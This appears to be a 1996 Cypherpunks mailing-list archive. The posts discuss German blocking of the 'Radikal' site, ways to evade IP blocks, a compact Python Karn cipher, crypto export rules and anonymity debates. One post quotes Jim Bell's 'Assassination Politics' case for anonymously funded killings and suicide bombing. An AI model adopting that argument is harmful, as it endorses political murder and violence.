(I also don't dislike Germans in general. I studied some German in high
school--don't ask me to use it, though!--and have visited Germany. They
just have a certain well-known tendency to take the authoritarian path at
times.)

--Tim

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Fletcher <fletch@ain.bls.com>
Date: Fri, 6 Sep 1996 19:59:39 +0800
To: cypherpunks@toad.com
Subject: Re: German prosecutors redouble attack on Net, subversive leftists
In-Reply-To: <322E94B9.41C67EA6@systemics.com>
Message-ID: <9609051411.AA28025@outland>
MIME-Version: 1.0
Content-Type: text/plain



> numbers, and alias the lot on their web site - this would increase the
> number of blocked addresses needed.  It might also be a good idea to run
> some proxies on unusual ports (eg. smtp, DNS, pop, ftp ports) (although
> of course this will then need to be a dedicated proxy machine) - again
> this would increase the size of the blacklist that the Germans must use,

	Of course if they're simply denying all traffic to a given
network, a different port isn't going to make any difference. :)

> and may involve some awkward router programming (for example, a router
> might be configured to allow all DNS traffic - if a proxy is sitting on
> the DNS port, then things get a bit difficult to set up).  Of course,
> netscape probably won't allow use of these ports (it certainly doesn't
> allow the use of port 79).

	I think the restriction on port 79 (the finger daemon port)
was because there still are a lot of fingerd's with buffer overrun
holes and it was just too easy to use netscape to exploit them.  Jeff
or another of the people from NS probably can give the full explanation.

---
Fletch                                                     __`'/|
fletch@ain.bls.com  "Lisa, in this house we obey the       \ o.O'    ______
404 713-0414(w)      Laws of Thermodynamics!" H. Simpson   =(___)= -| Ack. |
404 315-7264(h) PGP Print: 8D8736A8FC59B2E6 8E675B341E378E43  U      ------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: azur@netcom.com (Steve Schear)
Date: Fri, 6 Sep 1996 19:37:40 +0800
To: cypherpunks@toad.com
Subject: Re: Tack of Internet censorship
Message-ID: <v02130500ae5458353c67@[10.0.2.15]>
MIME-Version: 1.0
Content-Type: text/plain


>nobody@replay.com wrote:
>Six months ago, the Internet censors and Exon wannabees took the
>tack of "the Internet is too hard to censor".
>
>Now, their motto is "There will be some who get around our
>censorship, but we will try anyway."
>
>Unfortunately, I believe these censorship strikes will
>keep happening unless we find a way to stalemate them.
>
>What I am proposing is that Apache or other WWW servers
>have a way to allow access to site B's URL at site A,
>similar to the old trick of finger user@sitea.com@siteb.com.
>
>Implementation should be simple.  However, I wonder what
>is a good standard way to specify this in the URL or
>a site.

Whatever happened to Ray Cromwell's Decense
<http://www.clark.net/pub/rjc/decense.html> project ?  Decense, "a cgi
script designed to provide a double-blind pseudonym scheme which allows a
site to hide
behind a chain of http servers which 'proxy' for it. Neither the user [ID]
requesting the document, nor the ultimate address of the destination web
site is immediately available to prying government eyes.

-- Steve



PGP Fingerprint: FE 90 1A 95 9D EA 8D 61  81 2E CC A9 A4 4A FB A9
---------------------------------------------------------------------
Steve Schear, N7ZEZ       | Internet: azur@netcom.com
Grinder                   | Voice: 1-702-655-2877
Sacred Cow Meat Co.       | Fax: 1-702-658-2673
7075 W. Gowan Road, #2148 |
Las Vegas, NV 89129       |
---------------------------------------------------------------------

Just say NO to perscription DRUGS.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Fri, 6 Sep 1996 20:50:17 +0800
To: cypherpunks@toad.com
Subject: Metcalf and Other Net.Fogies
Message-ID: <ae545aa807021004884d@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



I'm evolving a hunch that the problems we're seeing with "old fogies"
denouncing the Net, and anonymity, and "smut on the Net," are part of a
larger cultural issue. Namely, the familiar case of an older generation
complaining about the sloth and sin of the younger generations.

(Caveat: I'm 44, so I'm certainly a generation older than many of you, and
am about the same age, give or take a few years, of Dyson, Metcalfe, Kapor,
Denning, and the other Net.Doomsayers. However, 20-25 years ago, when I was
in college, I recall of course similar predictions of disaster. (And as it
turned out, the predictions that promiscuity would lead to a disaster
turned out to be partly correct, viz. AIDS.))

Robert Metcalfe, inventor of Ethernet and founder of 3COM, and how
publisher of "Infoworld" and sailing enthusiast, was interviewed on CNBC a
few minutes ago. He repeated his prediction of an "Internet collapse" in
1996, based on overuse, on bad pricing models, on lack of controls, and on
other concerns.

It could be that the Dennings, Dysons, Kapors, etc. of the world are simply
growing jaded with the Net and are projecting their own ennui in their
comments that the Net may need to be controlled. This may come with age, as
I'm sure the Kapor of 25 years ago would not have wanted President Nixon
and Attorney-General Mitchell telling him what he could read and write.

(In fairness, none of these folks listed have called for censorship. But
all have expressed "concerns" of one sort or another. Not that discussing
concerns is inappropriate--after all, we do it all the time. But I sense in
many of their phrasings of concerns a stereotypical "old fogeyness"
emerging.)

Just a thought. Maybe the solution to the EFF problem is to "not trust
anyone over 30."

--Tim May (untrustable since 1981)

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Florian Lengyel <flengyel@dorsai.org>
Date: Fri, 6 Sep 1996 16:35:21 +0800
To: Rebecca L Madden <madden+@andrew.cmu.edu>
Subject: Re: up
In-Reply-To: <v01510115ae53a68f5a40@[204.62.128.229]>
Message-ID: <322F0FDC.1682@dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


Rebecca L Madden wrote:
> 
> it's three o four.
> I'm up.
> 
> Becky Madden
> #(412)-862-2934

Given the opportunity to construe something the wrong way, I will.
I take it this means we should call you now.

F Lengyel
flengyel@dorsai.org
http://www.dorsai.org/~flengyel
> 
> //<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\*//<@>\\
> 
> I believe that imagination is stronger than knowledge-
> That myth is more potent than history.
> I believe that dreams are more powerful than facts-
> That hope always triumphs over experience-
> That laughter is the only cure for grief.
> And I believe that love is stronger than death.
> 
>     -Robert Fulghum




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Fri, 6 Sep 1996 21:33:18 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Voluntary Disclosure of True Names
In-Reply-To: <ae53a8ec0c021004c604@[207.167.93.63]>
Message-ID: <199609051749.KAA12335@netcom20.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM
>>I think cpunks should hold the view that communication is a matter
>>of mutual consent between sender and receiver. if a receiver says,
>>"I don't want any anonymous messages", then should be able to block them.
>
>But this is precisely what nearly all of us have been arguing. Namely, that
>the issue of anonymity vs. providing of True Names, is a matter of
>_contract_ between parties, not something the government is justified in
>sticking its nose into.

well, I was satirizing the "extremist cpunk position" which is stronger
than the above. I noticed you didn't use the cpunk four-letter-word,
"we", but used a nearly equivalent construction.

I have seen it repeated here often that somehow anonymity is some kind
of a "right" that one should have in all kinds of different & important
transactions, not merely on "cyberspace debate societies". I see
here frequently the implication that *private*entities* that want to
enforce identity in their own transactions are somehow implementing
a corrupt, orwellian system. it sounded to me like that was all
Dyson was advocating.

also, I think you are being slightly disingenuous in masking your own
and other cpunks major objections to traceability, with the above,
"this is all we really want". what about situations
where the government requires you to give a physical identity for
some kind of a license etc? do you think there are no such valid
situations? is there any role for a government whatsoever in 
CryptoAnarchist Utopia and if so, is there any situation in which
demanding physical identity is reasonable?

>No, Dyson said "Therefore I would favor allowing anonymity -- with some
>form of traceability only under terms considerably stronger than what are
>generally required for a wiretap."
>
>This implies a role for government, and concomitant restrictions on related
>anonymity technologies, to provide traceability. So much for mutual
>agreement between sender and recipient.

it's clear Dyson hasn't totally thought out her position on anonymity. 
imho you are reading too much into her existing positions. because of your
government paranoia, you assume that when someone says they want
traceability, they are implying they want the government to
enforce it in all situations. 

>(I have nothing against senders and recipients agreeing to use the services
>of some third party in providing ultimate traceability. I'm not wild about
>the U.S. Government being this third party, paid for by tax money, but so
>long as it is not required, it's a minor concern to me.

that's what something like what Dyson has been referring to would suggest
to me. that is, that's exactly the system she sounded like she was
loosely advocating.

 I surmise, though,
>that use of the U.S. Government as a third party would not be optional, in
>the schemes of Dyson, Denning, and others of that ilk.)

Denning, yes; Dyson, I don't think so. remember Dyson has written
extensively on the subject of "the end of copyright" in some very
interesting essays and ideas. one major reason you would want to
enforce traceability in cyberspace would be to prevent copyright
infringement. so by attacking or "reforming" the concept of 
copyright, I'd say Dyson is very close to cpunk agendas and ideals
from what I have loosely seen.

there is something I've observed among extremists. by arguing
for an extreme position, they tend to polarize the world and
push away proposals that may actually benefit themselves in the
long run. in other words, a system A that is "close" to their
goals comes along, and if implemented would support them with
some minor compromises. but the extremists, such as there are
many on this list, say, "A is not good enough for us". but
then the window of opportunity is closed, and all future
proposals B, C, D, etc. are even worse and one may even
get implemented. so it becomes very important to "know when to
settle". extremists think that they are promoting their goals
when they reject anything less than perfect, when in fact they
may be sabotaging their own agenda in doing so.

one example I have brought up before: the post office is
setting up a digital signature system. it could be a good
way for cpunks to educate the public, to get crypto to the
masses, and to put in safeguards
that prevent misuse and try to guarantee it will be voluntary.
but intead they flame it as the beginning of Big Brother.

the problem is the mindset that "if its associated with government,
it is evil".  this can be self-sabotaging. but again I'm arguing
in subtleties that few here will grasp so I think I'll just
quit while I'm behind <g>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Thu, 5 Sep 1996 20:02:45 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: German prosecutors redouble attack on Net, subversive leftists
In-Reply-To: <Pine.3.89.9609042251.A15950-0100000@well.com>
Message-ID: <322E94B9.41C67EA6@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Declan McCullagh wrote:
>  
> The German Generalbundesanwaltschaft (Chief Federal Prosecutor's
> office) has "advised" the Internet providers to block access to
> http://www.xs4all.nl:80 and http://www.serve.com:80 due to
> supposedly illegal contents at the URLs http://www.serve.com/spg/154/,
> http://www.xs4all.nl/~tank/radikal//154/ and
> http://ourworld.compuserve.com/homepages/angela1/radilink.htm.
> 
> The commercial ISPs have blocked the routes to the servers.
> Their statement (in German) is at http://www.anwalt.de/ictf/p960901d.htm

I wonder how they are doing this?  We know that the Germans allow full
internet access (don't they?), so they can't be using a filtering http
proxy.  I guess they're blocking on IP number (and perhaps port).  It
might be a good idea for xs4all to gather up all of their spare IP
numbers, and alias the lot on their web site - this would increase the
number of blocked addresses needed.  It might also be a good idea to run
some proxies on unusual ports (eg. smtp, DNS, pop, ftp ports) (although
of course this will then need to be a dedicated proxy machine) - again
this would increase the size of the blacklist that the Germans must use,
and may involve some awkward router programming (for example, a router
might be configured to allow all DNS traffic - if a proxy is sitting on
the DNS port, then things get a bit difficult to set up).  Of course,
netscape probably won't allow use of these ports (it certainly doesn't
allow the use of port 79).

Gary
--
pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
Date: Fri, 6 Sep 1996 19:01:36 +0800
To: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Subject: Message Digest Ciphers (was Re: rc2 export limits..)
In-Reply-To: <Pine.OSF.3.91.960905084320.30700A-100000@fn3.freenet.tlh.fl.us>
Message-ID: <9609051609.AA00717@ch1d157nwk>
MIME-Version: 1.0
Content-Type: text/plain


P J Ponder writes:
>  How can I use SHA to encrypt something for someone else to
>  decrypt?  I know how to use it for authentication; am I missing
>  something here?

Check Applied Cryptography for info on ciphers such as "Karn",  
"Luby-Rackoff", and "MDC" ...  These are encryption algorithms that use  
one-way hashes as their block functions.

Attached is a version of the Karn cipher I implemented as an  
export-a-crypt-system .sig a while back...  I used python because it's my  
favorite language and has MD5 built-in.  I implemented the Karn cipher since  
it was the simplest (and therefore shortest) of the MD ciphers, not because  
it's the most secure.


andrew

#!/usr/local/bin/python -- -export-a-crypt-system MD5 CBC-mode Karn Cipher
from md5 import *;from sys import *;from string import *;M=md5;il=ir=M(argv[3]\
).digest();ki=M(argv[2]).digest();K,k=ki[:8],ki[8:];p=stdin.read(32);c={'-e':'\
l=x(l,il);r=x(r,ir);R=x(M(l+K).digest(),r);L=x(M(R+k).digest(),l);il=L;ir=R','\
-d':'L=x(M(r+k).digest(),l);R=x(M(L+K).digest(),r);L=x(L,il);R=x(R,ir);ir=r;il\
=l'};main="def x(a,b):return joinfields(map(lambda m,n:chr(m^n),map(lambda m:o\
rd(m),a),map(lambda m:ord(m),b)),'');\nwhile(p):p=ljust(p,32);l,r=p[:16],p[16:\
];exec(c[argv[1]]);stdout.write(L+R);p=stdin.read(32)";exec(main)
#try: echo 'TESTING 1 2 3' | karn -e 'key' 'I-V' | karn -d 'key' 'I-V'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Fri, 6 Sep 1996 18:59:18 +0800
To: "P. J. Ponder" <ponder@freenet.tlh.fl.us>
Subject: Re: rc2 export limits..
In-Reply-To: <Pine.OSF.3.91.960905084320.30700A-100000@fn3.freenet.tlh.fl.us>
Message-ID: <199609051547.LAA07458@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"P. J. Ponder" writes:
> The FIPS Pub (?180? ?181?) for the Secure Hash Algorithm (SHA) states in 
> the fine print at the beginning that SHA is export controlled.  I don't 
> have the document to refer to right now, but it plainly states that SHA  
> falls under ITAR.  As a cryptographic hash function, why would it be 
> controlled in this way?

Because the feds aren't stupid -- they know you can use any good hash
algorithm as the core for a block cipher.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "D. Moeller" <moe-san@stadt.com>
Date: Thu, 5 Sep 1996 21:44:31 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Re: FWD: Another try to kill democracy
In-Reply-To: <199609050642.XAA28858@dns2.noc.best.net>
Message-ID: <322EA63D.35B5@stadt.com>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> At 09:53 PM 9/2/96 +0000, SPG wrote:
> > I just got wind that the German government is planning to force german
> > ISP's to shut off access to my ISP, XS4ALL, because the german magazine
> >'Radikal' has a web page on xs4all.

<..>
 
> How serious is this threat?

No problem in gaining access so far. I even traces through Telekom and
C-Serve - no trace of restrictions.

Maybe just a way to generate traffic to a lame site?

Cheers Moe!
-- 

D. Moeller at WebLab U-Agency GmbH   
webadmin@stadt.com  http://www.stadt.com/u-agency/ 
moe-san@elcafe.com  http://www.elcafe.com/~moe-san/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: pjb@ny.ubs.com
Date: Fri, 6 Sep 1996 19:42:40 +0800
To: cypherpunks@toad.com
Subject: Re: Browne and foreign tyrants
Message-ID: <199609051640.MAA00475@sherry.ny.ubs.com>
MIME-Version: 1.0
Content-Type: text/plain


i also have never heard of an attempt on Hitler's life by anyone other that the
germans. the us did, however, assassinate Yamamoto Isoroku, and did a very neat
job of it at that.

i once read a sci-fi story about time travelers going back to kill Hitler,
and the disaster that occured when someone succeeded and Hitler's place was 
taken by someone even more onerous.  in the story there was a group of people
whose job it was to prevent this assassination, since so many people in the 
future had that idea that doing away with Hitler was a good thing to do there
was practically a queue of would-be assassins.

	-paul

> From cypherpunks-errors@toad.com Thu Sep  5 03:07:59 1996
> X-Sender: jimbell@mail.pacifier.com
> X-Mailer: Windows Eudora Light Version 1.5.2
> Mime-Version: 1.0
> Content-Type> : > text/plain> ; > charset="us-ascii"> 
> Date: Wed, 04 Sep 1996 16:43:23 -0800
> To: libernet-d@listserv.rmii.com, nwlibertarians@teleport.com,
>         dnowch2@teleport.com
> From: jim bell <jimbell@pacifier.com>
> Subject: Browne and foreign tyrants
> Sender: owner-cypherpunks@toad.com
> Content-Length: 2362
> 
> >From: "George D. Phillies" <phillies@WPI.EDU>
> >Subject: Re: Browne & foreign tyrants
> >There is a section of the Geneva Protocols forbidding actions in occupied
> >territories directed against officers of political parties.  Under that
> >section, the actions in Somalia against, e.g., the treasurer of General
> >Aidid's political party, were war crimes.  No one seems to get very upset.
> >
> >> If there is such a treaty, the US has a long history of ignoring it.
> >> 
> >> 0) Attempts to kill Hitler.
> >I don't think we ever tried this.
> 
> And this was a real shame.  Over 30 million people died in WWII, directly or 
> indirectly.  We knew that Hitler was going to be a problem well before 1936. 
>  Think how many could have been saved...
> 
> If anything, WWII is excellent proof that AP is a good idea.  Stauffenberg 
> was the German who bombed Hitler's meeting in 1944 but failed to kill him.  
> Stauffenberg knew as early as 1942 that Hitler needed to be killed, and a 
> recent "60 Minutes" episode related how hundreds of people knew about this 
> plot.
> 
> The reason he failed was that while he was preparing the two bombs in a 
> bathroom, he was interrupted. (The bomb's delay mechamism was acid 
> dissolving a metal.)  Rather than being caught, he left one of the 
> briefcases in the bathroom and went to the meeting with only one bomb.  
> Furthermore, he left the bomb at the meeting, but it was pushed behind the 
> heavy table after he left, which shielded Hitler from much of the force of 
> the explosion.
> 
> If AP (or at least, some anonymous reward mechanism for Stauffenberg's 
> family) had been available, he would have done "the honorable thing," and 
> walked up to Hitler with the bomb and instantly detonated it right there, 
> resulting in both Hitler's and Stauffenberg's certain death.  At least 
> hundreds of thousands or perhaps over a million people would have SURVIVED.  
> As it happened, Stauffenberg's reticence caused not only his death after 
> torture, but also the deaths of well over a hundred coup-plotters, but also 
> the thousands that were yet to die in the last 6+ months of WWII.
> 
> Question:  Would you kill yourself to save a million lives?  Even if you 
> wouldn't, would you change your mind if your heirs would be anonymously paid 
> an extra $10 million dollars or so?  I'd say that's a pretty substantial 
> motivation, wouldn't you?
> 
> 
> 
> Jim Bell
> jimbell@pacifier.com
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Fri, 6 Sep 1996 19:37:54 +0800
To: cypherpunks@toad.com
Subject: Re: Race Bit: C
Message-ID: <9609051658.AA20681@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On  5 Sep 96 at 0:30, Anonymous, a man with a double standard wrote:

> For them, I would go to jail; for you, I would even cooperate with
> the BATF (which should be defunded 100%, IMO). 

Why would you go to jail?  Who made jails and who would use violence 
to bring you in?

jfa




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: peter.allan@aeat.co.uk (Peter M Allan)
Date: Fri, 6 Sep 1996 00:31:37 +0800
To: cypherpunks@toad.com
Subject: Job for netescrow ? (was Secure anonymouse server protocol...
Message-ID: <9609051155.AA14504@clare.risley.aeat.co.uk>
MIME-Version: 1.0
Content-Type: text/plain




In the talk about replyable nym-mailers I haven't
yet seen netescrow mentioned.

You DID all read this ?

 > Oblivious Key Escrow
 > Matt  Blaze AT&T Research
 > mab@research.att.com
 > 12 June 1996
 > 
 > Abstract
 > We propose a simple scheme, based on secret-sharing over large-scale
 > networks, for assuring recoverability of sensitive archived data e.g.,
 > cryptographic keys. In our model any one can request a copy of the
 > archived data but it is very difficult to keep the existence of a
 > request secret or to subvert the access policy of the data owner.


This all hinges on a policy to be followed by archive holders defining
the conditions under which they release their shares.  
This could be receipt of a signed request from the owner (remailer).

Maybe the table relating nyms to reply addresses could be stored in
netescrow style so that captured remailers reveal nothing.  The problem
of operator coercion is not addressed by this.

Police investigations might apply "angry mob cryptanalysis" to find
a sender - convincing a sizable number of operators that a crime had
been committed with some particular piece of traffic.

Anybody want to estimate traffic + storage requirements ?  Or number
of participants needed for a viable scheme ?




 -- Peter Allan    peter.allan@aeat.co.uk




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brian Davis <bdavis@thepoint.net>
Date: Fri, 6 Sep 1996 19:47:02 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Voluntary Disclosure of True Names
In-Reply-To: <ae53a8ec0c021004c604@[207.167.93.63]>
Message-ID: <Pine.BSF.3.91.960905125658.19270L-100000@mercury.thepoint.net>
MIME-Version: 1.0
Content-Type: text/plain


> <Part of Tim May's post>
> 
> >the above is almost exactly what Dyson was saying, and I have been
> 
> No, Dyson said "Therefore I would favor allowing anonymity -- with some
> form of traceability only under terms considerably stronger than what are
> generally required for a wiretap."    ^^^^^^^^^^^^^^^^^^^^^
> 
I wonder what Dyson would consider acceptable?  Regardless, she is not 
going to get it.

EBD

> This implies a role for government, and concomitant restrictions on related
> anonymity technologies, to provide traceability. So much for mutual
> agreement between sender and recipient.
> 
> (I have nothing against senders and recipients agreeing to use the services
> of some third party in providing ultimate traceability. I'm not wild about
> the U.S. Government being this third party, paid for by tax money, but so
> long as it is not required, it's a minor concern to me. I surmise, though,
> that use of the U.S. Government as a third party would not be optional, in
> the schemes of Dyson, Denning, and others of that ilk.)
> 
> --Tim May
> 
> We got computers, we're tapping phone lines, I know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."
> 
> 
> 
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: SPG <tank@xs4all.nl>
Date: Thu, 5 Sep 1996 22:38:38 +0800
To: cypherpunks@toad.com
Subject: Re: FWD: Another try to kill democracy
Message-ID: <322ECF33.6871CB6D@xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain


James A. Donald wrote:
> 
> A few more details please:  What german agency is taking what action.

Oke, taken from: http://www.anwalt.de/ictf/p960901e.htm

++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

      Internet Content Task Force (ICTF), Press Release of Sep. 03, 1996

                         RA Michael Schneider, eco e.V.

A telefax was received by us from the Public Prosecutor General on
August 30 in which eco e.V. is informed of an
on-going investigatory procedure. We have been requested in this context
to inform all Internet service providers
affiliated with ICTF (Internet Content Task Force) the following in
writing:

"Under the following addresses in Internet:

     http://www.serve.com/spg/154/ 
     http://www.xs4all.nl/~tank/radikal//154/ 

and using the link on page 

     http://ourworld.compuserve.com/homepages/angela1/radilink.htm 

one can call up the entire edition of the pamphlet entitled "radikal Nr.
154". Parts of this pamphlet justify
preliminary suspicion of promoting a terrorist organization under §
129a, Par.3 of the German Criminal Code,
public condoning of criminal activities penalizable under § 140 no.2 of
the German Criminal Code and preliminary
suspicion of inciting to criminal activity under § 130a Par.1 of the
German Criminal Code. The Public Prosecutor
General at the Federal Court of Justice has therefore initiated a
criminal investigatory procedure against the
parties disseminating this pamphlet.

You are herewith informed that you may possibly make yourself subject to
criminal prosecution for aiding and
abetting criminal activities if you continue to allow these pages to be
called up via your access points and network
crosspoints"
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

> > Please considder mirroring or linking to this site.

As of today:

     http://burn.ucsd.edu/%7Eats/RADIKAL/ 

     http://www.jca.or.jp/~taratta/mirror/radikal/ 

     http://www.serve.com/~spg/ 

     http://huizen.dds.nl/~radikal 

     http://www.canucksoup.net/radikal/index.html 

     http://www.ecn.org/radikal 

     http://www.well.com/~declan/mirrors/ 

     http://www.connix.com/~harry/radikal/index.htm 

     http://www.connix.com/~harry 

 
> Linking is pointless if the site is cut off or access seriously threatened.
> 
> Mirroring is appropriate only if access is seriously threatened.
> 
> How serious is this threat?

Serious enough i think.

henk (SPG)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@ai.mit.edu
Date: Fri, 6 Sep 1996 06:37:19 +0800
To: stewarts@ix.netcom.com
Subject: Re: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <199609050327.UAA06817@dfw-ix8.ix.netcom.com>
Message-ID: <9609051711.AA06484@etna.ai.mit.edu>
MIME-Version: 1.0
Content-Type: text/plain




>as are the Dworkin/MacKinnon-inspired anti-pornography laws which
>Canada uses to censor lesbian bookstores and gay magazines.
>For the most part, other than sex and drugs,

Somewhat ironic that the first material to be banned under the
law was by MacKinnon. Meanwhile Dworkin has no credebility at all,
in addition to her "anti-porn" crusading activities she has a line
writing sado-masochistic erotica.

>Mark openly violates the
>censorship laws, and his shop occasionally gets raided, and after
>the last bust they've decided he's a co-conspirator with everybody
>who's grown drugs using seeds or light bulbs bought from him,
>and they're playing a FUD game about whether to charge him
>with 8 life sentences, in under-5-year pieces....)

There are equally bad cases in Texas. Two brothers who ran a hydroponics
equipment store got jailed on "conspiracy" charges. 


There are problems in Canada, no doubt. I was simply pointing out
that the Teal case is a bad example. The Zundel case is a much more
apprpriate one.


	Phill




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kent Briggs <72124.3234@compuserve.com>
Date: Fri, 6 Sep 1996 19:29:26 +0800
To: cypherpunks@toad.com
Subject: Re: rc2 export limits..
Message-ID: <199609051720.NAA24787@spirit.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Bill Stewart wrote:
> 
> I'm afraid my source is "Read it on the net and was surprised to hear it".
> My assumption is that the limit is for software that implements
> both signature and verification, since ITAR doesn't ban export of
> pure-authentication software.
> 
> Is the State Dept doc on the net?  It would be nice to have something
> saying there are well-defined rules that they agree to follow,
> unreasonable and unconstitutional though they may be.
> 

I'm still skeptical that such a restriction (1024-bit signatures)
exists.

If I recall, I originally found the State Dept. doc on the EFF site
under a heading of CJ Export kit or something similar.  I don't know 
if it is still there but it was out of date anyway as the contact in 
it had retired.

You can probably contact the DoS and have them mail you one (as I did):

Attn: Sam Capino
U.S. Department of State
Office of Defense Trade Controls
PM/DTC Room 200
1700 N. Lynn Street
Arlington, VA  22209-3113
Voice: 703-875-7396
Fax: 703-875-6647
  
The procedure is 5 pages and titled "Procedure for Submitting a
Commodity Jurisdiction Request for a Mass Market Software Product 
that contains Encryption"

When using RC2 and/or RC4, you have to request a separate test vector
sheet titled "Supplemental Form for Mass Market Software Expedited 
Review" for each CJ request.

Kent

P.S.  Does anyone know how to turn off this Gratis auto-signing
service?  I keep getting double posts when replying directly
to the list via Netscape to hks.lists.cypherpunks.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMi8L4SoZzwIn1bdtAQF8PQGAl4952bwt/PJofD21qR+sAF0jStgUs76I
NY9sfnXFcNHrFdgs6eEXHZ/lv3cstnnt
=W0Ug
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Fri, 6 Sep 1996 19:01:27 +0800
To: cypherpunks@toad.com
Subject: Re: Herr Schmidt
Message-ID: <199609052021.NAA29277@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:07 AM 9/5/96 -0700, Timothy C. May wrote:
>By the way, I used the name "Schmidt" in my satire post, sent out earlier
>this morning. I picked that name randomly, being a common German name
>(cognate to Smith, I believe), and meant nothing with regard to Stephan.
>
>(I also don't dislike Germans in general. I studied some German in high
>school--don't ask me to use it, though!--and have visited Germany. They
>just have a certain well-known tendency to take the authoritarian path at
>times.)
>--Tim


"Once all the Germans were warlike and mean
But that couldn't happen again.
We taught them a lesson in 1918...
And they've hardly bothered us since then!"

Tom Lehrer, "MLF Lullaby"
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Thu, 5 Sep 1996 23:25:02 +0800
To: cypherpunks@toad.com
Subject: Re: ... subversive leftists
In-Reply-To: <Pine.3.89.9609042251.A15950-0100000@well.com>
Message-ID: <Pine.HPP.3.91.960905130656.27617B-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 4 Sep 1996, Declan McCullagh wrote:

> The German Generalbundesanwaltschaft (Chief Federal Prosecutor's
> office) has "advised" the Internet providers to block access to

> "Radikal" (http://www.xs4all.nl/~tank/radikal) is a publication
> from the radical left that is illegal in Germany, but not in
> the Netherlands.

This is amazing. Without defending the German stand on the Revisionist
crap, that part is at least understandable in a historical context
(their sense of guilt for the unfortunate developments in the 30's
and 40's etc). But a quick overview of the contents of Radikal gives the
impression of an ordinary leftist zine, defining the outlawing of it as
pure political censorship in a Western 'democracy'. I'm truly surprised.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lebkowsky <jonl@well.com>
Date: Fri, 6 Sep 1996 19:37:49 +0800
To: cypherpunks@toad.com
Subject: Re: Metcalf and Other Net.Fogies
Message-ID: <2.2.16.19960905154111.2b6f55fa@mail.well.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:27 AM 9/5/96 -0700, Timothy C. May wrote:

>I'm evolving a hunch that the problems we're seeing with "old fogies"
>denouncing the Net, and anonymity, and "smut on the Net," are part of a
>larger cultural issue. Namely, the familiar case of an older generation
